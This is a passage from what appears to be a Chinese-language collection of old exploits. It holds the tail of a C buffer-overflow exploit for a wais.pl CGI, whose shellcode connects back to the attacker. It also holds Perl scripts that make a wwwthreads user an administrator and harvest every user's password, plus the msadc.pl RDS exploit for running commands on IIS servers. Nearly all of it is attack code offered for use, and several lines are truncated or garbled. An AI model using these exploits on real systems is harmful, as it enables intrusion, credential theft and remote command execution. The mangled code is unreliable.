"\x00\x09\x0b\x0c\r\n{};<>\\^()*[]$`&#~|\""

For this purpose a xor mask of 0x92011e11 was brute forced
*/

char hellcode[] =
"\xeb\x14\x58\x89\xc6\x31\xc9\xb1\x25\x81\x36\x11\x1e\x01\x92\x83\xc6\x04\xe2"
"\xf5\xeb\x05\xe8\xe7\xff\xff\xff\xfa\x64\x5f\xa3\xd1\x2f\xda\xa3\xc3\xae\x67"
"\x21\x10\x93\x4f\x8e\xa3\x1f\x88\xc4\x31\xac\x07\x1b\x47\x3a\xb3\x90\x98\x48"
"\x1d\x5f\x91\x97\x47\x8a\x98\x08\x67\x55\x57\x1c\x68\xe8\x98\x58\x1d\x1f\x17"
"\x97\x47\xb2\x91\xdc\x0f\x1b\x47\x3a\x30\x52\x15\x78\x81\x51\x13\x93\x4f\x8e"
"\xdc\x9e\x30\x52\x15\x21\x88\x50\x9a\x40\x19\xa3\xd8\xd3\x81\x1b\xc1\x5f\xcc"
"\x12\x98\xce\x40\x5f\x91\x2f\xc1\x1f\x6f\x11\x81\x53\x16\xed\xab\x96\x1a\x93"
"\x5f\x9a\x98\x40\x11\x1f\x5f\x0e\x30\x40\xdc\x9e\x30\x52\xef\xde\xcc\x12\xf9"
"\x9f\xfe\x6d\xee\x5f\x40\xd0\x53\xAA\xAA\xAA\xAA\x31\x63\xfb\x7f\x31\x72\xfa";

/* The IP address to connect to is gonna be at 0xAAAAAAAA */
/* Make sure it's encoded just as the shellcode is */

int main(int argc, char **argv)
{
char *iploc, *evilcode;
int sd, align=0;
unsigned long sip; /* IP to connect back to */
unsigned long dip; /* Target IP */
unsigned long retaddy=RETADDY; /* Default return address */

/* Whee, print the banner */

if(argc < 3) {
printf("OnWais Klote - Scrippie/Synnergy Networks\n");
printf("Use as: %s [ret addy] [align]\n",
argv[0]);
exit(0);
}

printf("******************************************************\n");
printf("+ OnWais Klote - Scrippie/Synnergy.net +\n");
printf("******************************************************\n");

/* I know inet_addr() is obsolete - too bad, you can't run this
program when you're on 255.255.255.255 - who is anyway? */

if((dip = inet_addr(argv[1])) == -1) {
printf("Error: Non valid IP address specified\n");
exit(-1);
}

if((sip = inet_addr(argv[2])) == -1) {
printf("Error: Non valid IP address specified\n");
exit(-1);
}

/* Use specified return address */
if(argc > 3) {
retaddy = strtoul(argv[3], NULL, 16);
}
printf("Return address : 0x%lx\n", retaddy);

/* Use specified alignment */
if(argc > 4) {
align = atoi(argv[4]);
}
printf("Alignment : %d\n", align);
printf("Target : %s\n\n", argv[1]);

/* We convert our IP to fit in the payload */
/* Think of this as a strange value? Think of the shellcode alignment */
sip ^= 0x1192011e;

/* Check if the given RETADDY won't ruin our payload */
if(ICinInt(retaddy, FORBIDDEN, sizeof(FORBIDDEN)-1)) {
printf("Error: Found illegal character in return address\n");
exit(0);
}
/* Check if the given IP won't ruin our shellcode */
if(ICinInt(sip, FORBIDDEN, sizeof(FORBIDDEN)-1)) {
printf("Error: Found illegal character in IP address\n");
exit(0);
}

/* Locate the IP position in the shellcode */
iploc=(char *)strchr(hellcode, 0xAA);
memcpy((void *) iploc, (void *) &sip, 4);

evilcode = buildOverflow(retaddy, align);

sd = wwwconnect(dip);
printf("Connected to %s\n", argv[1]);
printf("roceeding to send evil code...\n");
send(sd, evilcode, strlen(evilcode), 0);
printf("Sent!\n");

return(0);
}

char *buildOverflow(unsigned long retaddy, unsigned int align)
{
char source[SZ_SOURCEBUF];
char *smash, *output;
int c;

smash = (char *)xmalloc(SZ_FILEBUF+align+1);
output = (char *)xmalloc(SZ_SOURCEBUF+SZ_FILEBUF+align+1);

for(c=0;c

source[253] = 0xeb; /* Jump over few bytes between arrays on stack */
source[254] = 0x08;
source[255] = 0x00;

/*
Directory and Sourcename follow each other on stack closely
There are a few arbitrary bytes between them, therefore we
jump over them with 0xeb 0x08 and land somewhere in the given NOPS
*/

memset(smash, 0x90, 7+align);
/* Few nops on the stack - waisq ruins some bytes */
smash[7+align] = 0xeb; /* Jump over the EIP that we overflow */
smash[8+align] = 0x04; /* It's 4 bytes big */

/* Return address gets choked in here */

memcpy(smash+9+align, &retaddy, 4);
smash[13+align] = 0x00; /* strcat() needs the delimiter */

strcat(smash, hellcode); /* Copy the shellcode */

sprintf(output, "GET /cgi-bin/wais.pl?-s+%s+-t+%s HTTP/1.0\n\n",
source, smash); /* Stuff it all on the heap */

free(smash);
return(output); /* And return the pointer there */
}

/*
Connects to a webserver
"ip" is expected to be in network byte order
*/

int wwwconnect(unsigned long ip)
{
struct sockaddr_in sa; /* Sockaddr */
int sd; /* Socket Descriptor */

if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}

memset(&sa, 0x00, sizeof(struct sockaddr_in));
sa.sin_port=htons(80);
sa.sin_addr.s_addr=ip;

if(connect(sd, &sa, sizeof(struct sockaddr_in)) == -1) {
perror("connect()");
exit(-1);
}

return(sd);
}
/*
This function checks for illegal bytes in "long" types
*/

int ICinInt(long s, char *forbidden, size_t fsize)
{
int i,j;

for(i=0;i for(j=0;j if((char)(s >> j*8) == forbidden) return(1);
}
}
return(0);
}

/*
Wrapper for malloc() that does error checking
*/

void *xmalloc(size_t size)
{
void *blah;

if((blah = malloc(size)) == NULL) {
perror("malloc()");
exit(-1);
}
return(blah);
}

------------------------- END -----------------------------------------------------

ltkun

四十二.wwwthreads
wwwthreads是应用很广的论坛服务程序，在一些国外的安全论坛上应用较多。这套论坛程序有个漏洞，
其SQL information retrieval engine允许远程用户获取用户名和密码，允许入侵者使用insert的SQL命令，
获取数据库的访问权。在一个全世界最著名的黑客站点之一的论坛上测试通过。

Exploit:
-[ wwwthreads.pl

#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";

$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh";

#####################################################

$parms="Cat=&Username=$username&Oldpass=$passhash".
"&sort_order=5,U_Status%3d'Administrator',U_Security%3d100".
"&display=threaded&view=collapsed&ostsPer=10".
"&ost_Format=top&review=on&TextCols=60&TextRows=5&FontSize=0".
"&FontFace=&ictureView=on&icturePost=off";

$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n";

print sendraw($tosend);

sub sendraw {
     my ($pstr)=@_; my $target;
     $target= inet_aton($ip) || die("inet_aton problems");
     socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
           die("Socket problems\n");
     if(connect(S,pack "SnA4x8",2,80,$tar           select(STDOUT);      close(S);
           return @in;
     } else { die("Can't connect...\n"); }}


-[ w3tpass.pl

#!/usr/bin/perl
# download all wwwthread usernames/passwords once you're administrator
# send a fake cookie with authentication and fake the referer
# initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";

$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$zxcvzxvczxcvzxvczxcv";

#####################################################

@letts=split(//,'0ABCDEFGHIJKLMNOPQRSTUVWXYZ');
print STDERR "wwwthreads password snatcher by rain forest puppy\r\n";
print STDERR "Getting initial user lists...";

foreach $let (@letts){
$parms="Cat=&Start=$let";
$tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
"Cookie: Username=$username; Password=$passhash\r\n\r\n";

my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/showoneuser\.pl\?User=([^"]+)\"\>/){
  push @users, $1;}}}

$usercount=@users;
print STDERR "$usercount users retrieved.\r\n".
"Fetching individual passwords...\r\n";

foreach $user (@users){
$parms="User=$user";
$tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
"Cookie: Username=$username; Password=$passhash\r\n\r\n";

my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/OldPass value = "([^"]+)"/){
  ($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  $user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  print $user.':'.$pass."::::::::::\n";
  last;}}}

print STDERR "done.\r\n\r\n";

sub sendraw {
     my ($pstr)=@_; my $target;
     $target= inet_aton($ip) || die("inet_aton problems");
     socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
           die("Socket problems\n");
     if(connect(S,pack "SnA4x8",2,80,$target)){
           select(S);         $|=1;
           print $pstr;        my @in=<S>;
           select(STDOUT);      close(S);
           return @in;
     } else { die("Can't connect...\n"); }}

ltkun

四十三.msadcs.dll
IIS 4.0的缺省安装设置的是MDAC1.5，这个安装下有一个/msadc/msadcs.dll的文件，也允许
通过web远程访问ODBC，获取系统的控制权.、如果web目录下的/msadc/msadcs.dll/可以访问，
那么ms的任何补丁可能都没用，用类似:
/%6Dsadc/%6Dsadcs.dll/V%62BusO%62j.V%62BusO%62jCls.GetRecordset
的请求，就可以绕过安全机制进行非法的VbBusObj请求，从而达到入侵的目的。
攻击程序:
#将下面这段保存为txt文件，然后: "perl -x 文件名"

#!perl
#
# MSADC/RDS 'usage' (aka exploit) script
#
#     by rain.forest.puppy
#
# Many thanks to Weld, Mudge, and Dildog from l0pht for helping me
# beta test and find errors!

use Socket; use Getopt::Std;
getopts("e:vd:h:XR", \%args);

print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n";

if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h  { -d  -X -v }
     -h       = host you want to scan (ip or domain)
     -d      = delay between calls, default 1 second
     -X           = dump Index Server path table, if available
     -v           = verbose
     -e           = external dictionary file for step 5

     Or a -R will resume a command session

~; exit;}

$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");}
if (defined $args{X} && !defined $args{R}) { &hork_idx; exit; }

if (!defined $args{R}){ $ret = &has_msadc;
die("Looks like msadcs.dll doesn't exist\n")if $ret==0}

print "lease type the NT commandline you want to run (cmd /c assumed):\n"
     . "cmd /c ";
$in=; chomp $in;
$command="cmd /c " . $in ;

if (defined $args{R}) {&load; exit;}

print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;

print "\nStep 2: Trying to make our own DSN...";
&make_dsn ? print "<>\n" : print "<>\n";

print "\nStep 3: Trying known DSNs...";
&known_dsn;

print "\nStep 4: Trying known .mdbs...";
&known_mdb;

if (defined $args{e}){
print "\nStep 5: Trying dictionary of DSN names...";
&dsn_dict; } else { "\nNo -e; Step 5 skipped.\n\n"; }

print "Sorry Charley...maybe next time?\n";
exit;

##############################################################################

sub sendraw {      # ripped and modded from whisker
     sleep($delay); # it's a DoS on the server! At least on mine...
     my ($pstr)=@_;
     socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
           die("Socket problems\n");
     if(connect(S,pack "SnA4x8",2,80,$target)){
           select(S);           $|=1;
           print $pstr;           my @in=<S>;
           select(STDOUT);           close(S);
           return @in;
     } else { die("Can't connect...\n"); }}

##############################################################################

sub make_header { # make the HTTP request
my $msadc=<< length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
return $out;}

##############################################################################

sub rdo_success { # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart\/mixed/){
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}

##############################################################################

sub make_dsn { # this makes a DSN for us
my @drives=("c","d","e","f");
print "\nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
     "Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
     . $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq "404"; # not found/doesn't exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/(H2)Datasource creation successful<\/H2>/;}}
} return 0;}

##############################################################################

sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0\n\n");
return $results[0];}

##############################################################################

sub try_btcustmr {
my @drives=("c","d","e","f");
my @dirs=("winnt","winnt35","winnt351","win","windows");

foreach $dir (@dirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;

my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!\n";save(1,1,$drive,$dir);exit;}
else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}

##############################################################################

sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
     $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}

##############################################################################

sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "\n$in\n";}

##############################################################################

sub save {
my ($p1, $p2, $p3, $p4)=@_;
open(OUT, ">rds.save") || print "roblem saving parameters...\n";
print OUT "$ip\n$p1\n$p2\n$p3\n$p4\n";
close OUT;}

##############################################################################

sub load {
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)}; dbq=";
open(IN,"IN>; close(IN);
$ip="$p[0]"; $ip=~s/\n//g; $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
$p[3]="$p[3]"; $p[3]=~s/\n//g; $p[4]="$p[4]"; $p[4]=~s/\n//g;
if($p[1]==1) {
$reqlen=length( make_req(1,"$p[3]","$p[4]") ) - 28;
$reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,"$p[3]","$p[4]"));
if (rdo_success(@results)){print "Success!\n";}
else { print "failed\n"; verbose(odbc_error(@results));}}
elsif ($p[1]==3){
     if(run_query("$p[3]")){
     print "Success!\n";} else { print "failed\n"; }}
elsif ($p[1]==4){
     if(run_query($drvst . "$p[3]")){
     print "Success!\n"; } else { print "failed\n"; }}
exit;}

##############################################################################

sub create_table {
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table 'AZZ' already exists/;
return 0;}

##############################################################################

sub known_dsn {
# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
my @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
     "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
     "banner", "banners", "ads", "ADCDemo", "ADCTest");

foreach $dSn (@dsns) {
     print ".";
     next if (!is_access("DSN=$dSn"));
     if(create_table("DSN=$dSn")){
     print "$dSn successful\n";
     if(run_query("DSN=$dSn")){
     print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; } else {
print "Something's borked. Use verbose next time\n";}}} print "\n";}

##############################################################################

sub is_access {
my ($in)=@_;
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}

##############################################################################

sub run_query {
my ($in)=@_;
$reqlen=length( make_req(3,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(3,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}

##############################################################################

sub known_mdb {
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";

# this is sparse, because I don't know of many
my @sysmdbs=(     "\\catroot\\icatalog.mdb",
           "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
           "\\system32\\certmdb.mdb",
           "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%

my @mdbs=(     "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
           "\\cfusion\\cfapps\\forums\\forums_.mdb",
           "\\cfusion\\cfapps\\forums\\data\\forums.mdb",
           "\\cfusion\\cfapps\\security\\realm_.mdb",
           "\\cfusion\\cfapps\\security\\data\\realm.mdb",
           "\\cfusion\\database\\cfexamples.mdb",
           "\\cfusion\\database\\cfsnippets.mdb",
           "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
           "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
           "\\cfusion\\brighttiger\\database\\cleam.mdb",
           "\\cfusion\\database\\smpolicy.mdb",
           "\\cfusion\\database\cypress.mdb",
     "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
           "\\website\\cgi-win\\dbsample.mdb",
     "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
     "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
           ); #these are just
foreach $drive (@drives) {
foreach $dir (@dirs){
foreach $mdb (@sysmdbs) {
print ".";
if(create_table($drv . $drive . ":\\" . $dir . $mdb)){
print "\n" . $drive . ":\\" . $dir . $mdb . " successful\n";
if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
print "Success!\n"; save (4,4,$drive . ":\\" . $dir . $mdb,""); exit;
} else { print "Something's borked. Use verbose next time\n"; }}}}}

foreach $drive (@drives) {
foreach $mdb (@mdbs) {
print ".";
if(create_table($drv . $drive . $dir . $mdb)){
print "\n" . $drive . $dir . $mdb . " successful\n";
if(run_query($drv . $drive . $dir . $mdb)){
print "Success!\n"; save (4,4,$drive . $dir . $mdb,""); exit;
} else { print "Something's borked. Use verbose next time\n"; }}}}
}

##############################################################################

sub hork_idx {
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw2(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
     $results[$c]=~s/\x00//g;
     $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
     $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
     $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
     $d{"$1$2"}="";}
foreach $c (keys %d){ print "$c\n"; }
} else {print "Index server doesn't seem to be installed.\n"; }}

##############################################################################

sub dsn_dict {
open(IN, "<$args{e}") || die("Can't open external dictionary\n");
while(<IN>){
     $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
     next if (!is_access("DSN=$dSn"));
     if(create_table("DSN=$dSn")){
     print "$dSn successful\n";
     if(run_query("DSN=$dSn")){
     print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; } else {
print "Something's borked. Use verbose next time\n";}}}
print "\n"; close(IN);}

##############################################################################

sub sendraw2 {      # ripped and modded from whisker
     sleep($delay); # it's a DoS on the server! At least on mine...
     my ($pstr)=@_;
     socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
           die("Socket problems\n");
     if(connect(S,pack "SnA4x8",2,80,$target)){
           print "Connected. Getting data";
           open(OUT,">raw.out"); my @in;
           select(S);     $|=1;      print $pstr;           
           while((S)){ print OUT $_; push @in, $_; print STDOUT ".";}
           close(OUT); select(STDOUT); close(S); return @in;
     } else { die("Can't connect...\n"); }}

##############################################################################

sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) {
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually

##############################################################################

sub funky {
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO miscofiguration message\nAborting.\n";
exit;}
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}
if($error=~/specified Handler has denied Access/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}}

##############################################################################

sub has_msadc {
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
my $base=content_start(@results);
return 1 if($results[$base]=~/Content-Type: application\/x-varg/);
return 0;}

########################


(文中程序由于时间匆忙,可能有小错误,请自己校对)